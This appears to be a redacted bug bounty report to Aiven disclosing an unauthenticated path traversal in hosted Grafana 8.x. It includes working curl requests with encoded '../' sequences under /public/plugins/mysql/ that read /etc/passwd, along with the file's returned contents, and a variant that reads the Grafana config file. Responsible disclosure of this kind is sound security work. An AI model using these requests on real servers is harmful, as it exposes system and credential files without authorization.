Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read

## Summary: Hi team, I've found a path traversal issue in the Grafana instances hosted on the Aiven platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server. ## Steps To Reproduce: 1. Login at https://console.aiven.io 1. Create a new Grafana instance and wait till it's up and running 1.Run the following curl command to get the content of the /etc/passwd file on the server: ``` curl https://grafana-303ca6f8-████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ``` Output: ``` $ curl https://grafana-303ca6f8-███████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin ███ █████ ██████ ██████████ ██████████ ████████ ██████ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-coredump:x:992:991:systemd Core Dumper:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin systemd-timesync:x:991:990:systemd Time Synchronization:/:/sbin/nologin ██████████ dbus:x:81:81:System message bus:/:/sbin/nologin █████ ████████ ██████ █████████ ██████████ ███ ██████████ ███ █████ █████████ ██████████ ███ ███ ████ ███ ``` Some other examples: See the Grafana config: ``` curl --path-as-is https://grafana-303ca6f8-█████████.aivencloud.com/public/plugins/mysql/../../../../../../../../../../../../usr/share/grafana/conf/defaults.ini ``` I'll keep my Grafana instance running so you can try to reproduce it with the examples above. ## Impact An unauthenticated user can get access to all system files if he knows the exact path of the file.